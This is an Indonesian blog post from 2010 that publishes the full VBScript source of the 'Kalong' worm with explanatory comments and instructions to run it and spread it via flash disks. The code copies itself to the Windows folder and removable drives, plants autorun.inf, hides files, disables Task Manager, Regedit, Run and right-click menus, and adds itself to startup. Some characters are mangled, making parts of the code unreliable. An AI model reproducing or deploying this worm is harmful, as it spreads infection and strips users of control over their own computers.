Senin, 15 November 2010

Nich merupakan Code virus kalong :

KAwal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virusK
on error resume next

KDim kata-kata berikut iniK
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

KSet sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

KCopy diri untuk menjadi file induk di Windows Path (example: C:\Windows) K
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
KBuat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolokK
KMenyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disketK

for each flashdrive in fs.drives
KCek DriveK
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

KBuat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\   K
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

KBuat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information) K
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

KManipulasi RegistryK

set kalong = createobject(”WScript.Shell”)

KManip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY K
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” Komputer diambil alih KALONG.VBS Ra4chm4t “

KManip – Set agar file hidden tidak ditampilkan di ExplorerK
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0?, “REG_DWORD”

KManip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task ManagerK
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1?, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1?, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1?, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1?, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1?, “REG_DWORD”

KManip – Disable klik kananK
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1?, “REG_DWORD”

KManip – Munculkan Pesan Setiap Windows StartupK
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

KManip – Aktif setiap Windows StartupK
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

KManip – Ubah RegisteredOwner dan OrganizationK
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
dan Di Paste ke Notepad dan save dengan nama Kalong.dll.vbs
* Untuk Intruksi menjalankannya :
1. Ubah namanya menjadi Kalong.dll.vbs
2.Untuk mencoba menjalankannya double       klik Kalong.vbs
3.Untuk penyebarannya , pasang di flash disk dan buat file Autorun.inf nya untuk menjalankan Kalong.vbs
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)